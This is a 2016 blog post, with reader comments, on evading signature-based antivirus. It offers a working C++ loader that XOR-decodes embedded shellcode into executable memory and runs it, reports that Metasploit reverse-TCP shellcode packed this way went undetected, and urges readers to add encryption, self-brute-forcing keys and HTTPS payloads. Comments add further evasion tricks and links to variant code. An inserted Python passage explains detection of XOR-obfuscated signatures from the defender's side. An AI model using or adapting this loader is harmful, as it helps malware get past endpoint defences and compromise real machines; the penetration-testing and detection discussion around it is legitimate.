Bypassing Antivirus With 10 Lines Of Code Or (Yet Again) Why Antivirus Is Largely Useless

I had originally set out to write a long winded blog post on different antivirus bypass techniques. I went through what was supposed to be step 1 of my guide and uploaded my resulting binary to virustotal. To my complete and utter shock, the binary got a 0/56 detection rate. I decided to throw out my long winded idea and move forward with this quick, dirty, and unbelievably easy method.

I believe that most of my readers would agree with me that bypassing most antivirus based solutions is rather trivial, however I do occasionally run into some people who only rely on tools that generate binaries that can easily be fingerprinted and flagged by antivirus solutions. This article is largely intended for that audience.

Before I dive into this small tidbit of C++ code, I'd like to touch on a tool that is really good at producing binaries that almost always evade detection, Veil-Evasion (part of the Veil-Framework). This tool is awesome (many thanks to @harmj0y and others for creating and contributing to this awesome project) and in almost all instances where I have had to use it, it has not let me down. If it has, I blame people who keep generating binaries and then testing them on virustotal. If you people could stop doing that, that would be great.

At any rate, this begs the question: if tools like Veil-Evasion are so epic, why should you care about knowing how to slap together a binary with a shellcode payload yourself? Well, there are a number of reasons:

  • People get busy and tools become deprecated
  • The binaries generated by tools become fingerprintable; not the payload necessarily, but the compiled structure of the binary.
  • As a penetration tester, you should really know how to do this. Ups your leet cred.. or so I hear.
Before you have a look at the code below, it's worth noting that this targets the Windows platform, as obviously noted by the reference to windows.h ;)
  #include <windows.h>
  #include <iostream>
  #include <cstring>   // memcpy

  int main(int argc, char **argv)
  {
      // Your shellcode, already XORed with the key 'x', goes here, e.g. 0x4C, 0x4F, 0x4C
      char b[] = {/* ... */};
      char c[sizeof b];

      // Undo the XOR to recover the original bytes
      for (size_t i = 0; i < sizeof b; i++) { c[i] = b[i] ^ 'x'; }

      // Allocate a readable/writable/executable buffer, copy the decoded bytes in, and jump to them
      void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      if (exec == NULL) { return 1; }
      memcpy(exec, c, sizeof c);
      ((void(*)())exec)();
  }

Quite simply, the code above creates a character array holding shellcode you can add, performs an XOR operation with the incredibly sophisticated key of lowercase 'x', allocates some memory, copies the character array into said allocated memory, and executes it. It may be worth highlighting that you will need to XOR your shellcode with your key of choosing (in this case 'x') before you put it in the code above and compile.
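To make the XOR step concrete from the detection side, here is an added Python example; it is not code from the original post. It shows that a single-byte or short repeating-key XOR is reversible obfuscation, and that a scanner holding a known byte pattern does not have to try every possible key: at each offset it derives the key from the known plaintext and uses the remaining signature bytes to confirm it. The signature marker, the filler bytes and the two-byte key are constructed placeholders for this demo, not real AV signatures.

```python
# Added example (not from the original post): why a single-byte or short repeating-key
# XOR hides a payload from a naive byte-match but not from a scanner that treats the
# signature as known plaintext. All sample data below is constructed for this demo.

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The same routine encodes and decodes (it is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _is_primitive_key(key: bytes) -> bool:
    """True unless the key is just a shorter key repeated (b'xx' is really b'x')."""
    n = len(key)
    return not any(n % d == 0 and key == key[:d] * (n // d) for d in range(1, n))


def find_xored_signature(blob: bytes, signature: bytes, max_key_len: int = 4):
    """Locate `signature` inside `blob` even if it was XORed with a repeating key of
    1..max_key_len bytes.

    No key brute force is needed: at each candidate offset the key must equal
    blob[off + j] ^ signature[j] for j < key_len, so the scanner derives it directly and
    uses the remaining signature bytes to confirm the guess. Work is linear in the blob
    size for each key length, which is why "AV won't try every XOR" is a weak assumption.

    Returns [(offset, key), ...]. A key of all zero bytes means the bytes were in the clear.
    """
    if len(signature) < 4 * max_key_len:
        raise ValueError("signature too short to confirm keys of that length reliably")
    hits = []
    for key_len in range(1, max_key_len + 1):
        for off in range(len(blob) - len(signature) + 1):
            key = bytes(blob[off + j] ^ signature[j] for j in range(key_len))
            if not _is_primitive_key(key):
                continue  # already reported under a shorter key length
            if xor_bytes(blob[off:off + len(signature)], key) == signature:
                hits.append((off, key))
    return hits


# Constructed placeholder: a marker string standing in for a real detection signature.
SIGNATURE = b"SAMPLE-SIGNATURE-NOT-REAL"
FILLER = bytes(range(64))  # constructed "benign" bytes surrounding the payloads


def build_sample_blob() -> bytes:
    """Constructed 'binary': filler, the marker under the single-byte key 'x' used in the
    post, more filler, the same marker under a two-byte key, more filler."""
    return (FILLER
            + xor_bytes(SIGNATURE, b"x")
            + FILLER
            + xor_bytes(SIGNATURE, b"\x13\x37")
            + FILLER)


if __name__ == "__main__":
    for off, key in find_xored_signature(build_sample_blob(), SIGNATURE):
        print(f"marker found at offset {off} under XOR key {key!r}")
```

Running it reports the marker at offset 64 under key b'x' and at offset 153 under key b'\x13\x37'. The known-plaintext trick applies to any fixed repeating-key XOR where the scanner knows at least key-length bytes of the original payload, so lengthening the key by a byte or two barely changes the cost; what actually raises the bar for a defender is looking at behaviour, such as an RWX allocation followed by a jump into it, rather than at bytes on disk.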

So you are probably looking at that and thinking 'really?' - I know how you feel. This is how I felt after I intended this to be step 1 of my tutorial, ran it through virustotal, and it returned 0/56 detection. I'd like to stress that this is an incredibly simple and most basic technique, yet its success is still rather astonishing.

I originally wrote this example and tested it on virustotal a while ago, but I did reanalyze the executable on virustotal at the time of publishing this post and found it still had a 0 detection rate.

The binary you generate will very likely not match the SHA256 of the binary I have tested; the binary I uploaded contained shellcode generated with the metasploit framework.

Final Comments

Alright, so antivirus is dead. We all know that. That being said, we can't argue with the fact that over 95% of organizations are still depending on antivirus to protect endpoints.
Is there a better way? Certainly. A number of vendors, which I shall not name, have launched products that take a new approach to protecting endpoints, primarily focusing on identification of known exploit techniques. This is usually performed by injecting DLLs into processes that will monitor for these known techniques and prevent the exploit from working successfully.
Is this a fool proof technique? I would be inclined to say no. The bar will be raised, but a new type of cat and mouse game will begin.

Final note: The above may not work on _all_ antivirus solutions. I figure that was obvious, but thought I would mention it before the pitchforks come after me!

Edit (3/17/2016): Wow. This post blew up a lot more than I intended it to. Please bear in mind that this article was targeted at penetration testers. The goal was to demonstrate an extremely simplistic signature based AV bypass technique. I didn't point out 'signature' as I assumed it was obvious that heuristics capabilities would very likely pick this up - although it really depends on your payload more than anything else. I don't advocate using this technique over the infinitely more sophisticated implementations that can be found in Veil-Framework or Shellter. Think of the above code as a template - get creative - make the encoding routine more complicated - perhaps implement encryption with key bruteforcing? then perhaps add some prime generation at the get go to throw off heuristics if you wish to be fancy. Use payloads that communicate over HTTPS as well. Sky's the limit - this was just a super basic example.

53 comments:

  1. Unknown, March 14, 2016 at 8:27 PM
    So the shellcode you place in there must be pre xor'ed with 'x' so that the code xor's it back to usable shellcode, right? Another obvious question, was the shellcode detectable before you just xor'ed it?
    Reply
    Replies
    1. ...., March 14, 2016 at 9:54 PM
      Yes, absolutely. The shellcode must be pre XORd with the desired key. And yes, the shellcode I used was a standard meterpreter shellcode for reverse TCP that was not encoded with anything fancy. It was detected by almost all AV on virustotal.
    2. Anonymous, March 17, 2016 at 1:51 AM
      This works for entire executables not just shellcode, and why would anybody want to protect shellcode into exe?

      http://hackforums.net/showthread.php?tid=5197517
      http://hackforums.net/showthread.php?tid=5168562
  2. Anonymous, March 15, 2016 at 12:15 AM
    The other vendor you speak about that does DLL injection - TRAPS... It only works on .pdf and MS Office filetypes. That's it! A straight up .exe will pop on their endpoint just the way you created this one.
    Reply
    Replies
    1. ...., March 15, 2016 at 5:36 AM
      That is one of them - but so is (for example) EMET and it works on binaries. :) I'm not sure if that solution does more than pdf and office filetypes, but I believe that it does.
    2. Nathaniel Manzi, March 16, 2016 at 4:04 AM
      Traps works on binaries for exploit detection, I'm currently doing deployments and testing and can vouch for this. Wildfire analyses unknown binaries and they can be blocked by default until a verdict is given.
    3. Anonymous, March 16, 2016 at 9:55 PM
      You're assuming the end point is on the network with Wildfire. What happens if it's a laptop off network? Also, my issue with Wildfire AND Traps is that their vendor recommends you do application white-listing for it to work. I've been popping boxes left and right with Traps running, using basic Metasploit binaries. No detection. :-/
  3. Josh Stone, March 15, 2016 at 12:26 AM
    It's these little moments that have convinced me that, as the Symantec exec said famously, A/V is thoroughly dead. When the silliest things work, you know that the barrier of entry is low enough that anyone can get in.

    My favorite one is some of these network threat protection features that watch network connections and do some "layer seven analysis". Send a payload, it kills the socket when it detects a meterpreter. So I made a shim and custom stager that sends over 64k of random garbage, and then sends the meterpreter payload. A/V gets tired easily, and gives up every time.

    A simple XOR is terrible crypto, but it's "good enough" because A/V isn't going to try all XORs on every substring of every EXE to match signatures. And even if it did, then do a two-byte XOR, etc. The first rule of A/V bypass is to do something that you know A/V isn't willing to do.
    Reply
    Replies
    1. Anonymous, March 15, 2016 at 7:20 AM
      XOR isn't for encryption in this use case, it's for obfuscation.
    2. Anonymous, March 16, 2016 at 3:36 PM
      Hey Josh, that sounds sick. Is there any way you could explain or demonstrate using an example? Really wanna try this.
  4. jérémie banier, March 15, 2016 at 2:31 AM
    That's pretty bad but since AV are signature based this isn't totally unexpected (hence your research), but using a behavior based detection like sandboxing or auditing this should be obvious, right? Any recommendations on a se-linux like level of audit for windows systems?
  5. Anonymous, March 15, 2016 at 5:40 AM
    So the antivirus could not find the payload anymore because you encrypted it.

    Maybe I am being silly, but it seems reasonable to me: Trying to do static analysis of C code to identify all the possible custom encryption mechanisms seems a difficult problem.
    Reply
    Replies
    1. Anonymous, March 15, 2016 at 9:47 AM
      Yes but the point is that AV are useless. It's like having a heavily reinforced steel door as protection which you can just walk around to get in.
    2. Artur Korobeynyk, March 15, 2016 at 6:33 AM
      This is only a signature detection fail. VirusTotal does not include behavioral or heuristic scan, and both will show that there is something wrong with this file.
  6. Anonymous, March 15, 2016 at 7:53 AM
    One argument for why keep A/V around is that in real-world day-to-day operations in an organisation you still get many hits on your end-point devices from people who have tried to execute obvious and well known malware.

    So your less savvy users tend to get some help from the A/V even though they should have caught the obvious in the first place.
  7. Replies
    1. Anonymous, March 15, 2016 at 12:54 PM
      Because once it starts to spread the A/V providers will catch wind of the new binary and then get the XOR'd binary's signature. Most companies have their A/V updated every few hours so within a 24 hour period or so A/V will catch the binary. Thus begins a cat and mouse game of how fast can folks supply malware and how fast can A/V catch it.

      This'll work for directed attacks but not really for hitting as many hosts in the world as you can.
    2. SilverWingedSeraph, March 15, 2016 at 3:38 PM
      Why not, then, have multiple (or hundreds) of versions, or become polymorphic? Cracking XOR "encryption" is fast, simple: give it a random, short key that has to be cracked.

      AV engines will either have to spend as much time as you cracking the "encryption" on every single file, or have hundreds? thousands? of signatures just for your malware.
    3. ...., March 15, 2016 at 4:23 PM
      This was intended to show a very simple and basic approach. You could absolutely implement AES, encrypt the shellcode with a simple key and then embed a decryption routine within the binary that just brute forces itself. This, in my testing, has been effective against a number of heuristics based AV engines.
    4. Anonymous, March 16, 2016 at 10:13 AM
      Actually, most malware makers are making a shift towards generation time fuds anyways. That's why there's a push for better heuristics from anti-virus/anti-malware tools.

      PS: generation-time fuds are almost a requirement now, but aren't reasonably considered fully undetectable (fud). It's possible to catch them. But runtime fud applications will be the best big push. Very few malware authors are doing this these days. Short and sweet, wrapper can be anything -> code to run is generated at run time -> runtime code is unique to the generation. This is the real fud.

      Also, don't tell people who buy malware commercially of this problem. They might realize they're being scammed with "___ RAT COMES WITH REAL FUD OPTIONS!"-type offers.
  8. Anonymous, March 15, 2016 at 8:56 AM
    Thank you for this article. I managed to get a standard metasploit shellcode loaded and executed with the little piece of C code you provided but I had to remove the XOR decoding piece. The reason is: how do you xor encode a shellcode with a key of your choice?

    I couldn't find a way to do it with msfvenom or Veil-Ordnance...
    Reply
    Replies
    1. ...., March 15, 2016 at 9:06 AM
      I left this part out on purpose as an exercise for the reader. Python is your friend. :)
  9. Anonymous, March 15, 2016 at 11:16 AM
    The good old Virustotal detection fallacy. You know Virustotal covers this in their About section?

    https://www.virustotal.com/en/about/

    Search for the keyword "BAD IDEA"
    1. ...., March 15, 2016 at 11:19 AM
      I have tested this approach manually on 10 AV solutions in my lab as well.
  10. Josh Dustin, March 16, 2016 at 10:23 AM
    Very nice, thank you for sharing. Looks like your file is now at 1/56.
    https://www.virustotal.com/en/file/acf5823b5f7fa876a80ad696717b91331820a96c0cbf997bde1211602b2457fd/analysis/
    Reply
    Replies
    1. ...., March 16, 2016 at 1:03 PM
      No surprise. This isn't a technique that will work forever. That being said, trivial modifications to the above code would get it back down again (with sig based AV).
  11. Anonymous, March 16, 2016 at 12:31 PM
    Hi, I am wondering why your file was not picked up by Virustotal after a week or so went by? I thought files were checked by the AV companies or something like that? So I am assuming that I am wrong but idk. Please reply, thanks.
    Reply
    Replies
    1. ...., March 16, 2016 at 7:27 PM
      No idea. I'm curious too.
  12. Rodrigo Ruiz, March 16, 2016 at 1:09 PM
    Last year I published Apoc@lypse: The End of Antivirus. With one line of work we can make all antivirus kill itself.
    See Spring 2016 edition of Cyber Security Review. We can bypass all AV just using DOS within Windows.
    Reply
  13. Anonymous, March 16, 2016 at 1:17 PM
    Thanks for this short & interesting article.
    I may be overestimating A/V but: Is there any chance that an A/V performing some real-time analysis could detect the "deciphered/clear" payload in memory (during memcpy or while calling "exec")?

  14. hvqzao, March 27, 2016 at 3:02 AM
    I've finally had some time to try it and well... virustotal 13/57 and instant detection in Windows 10. Repository: https://github.com/hvqzao/evadeav

  15. Anonymous, June 1, 2016 at 4:39 AM
    Created a multibyte encoding version that still has a very low detection rate on VT (2/55) - PoC here https://github.com/Arno0x/MultibyteEncodedShellcode